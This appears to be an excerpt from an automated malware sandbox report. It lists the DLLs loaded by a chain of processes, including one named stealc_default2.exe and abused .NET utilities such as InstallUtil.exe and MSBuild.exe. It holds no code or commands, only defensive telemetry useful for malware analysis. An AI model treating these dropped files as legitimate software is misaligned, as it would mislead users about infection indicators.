Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll
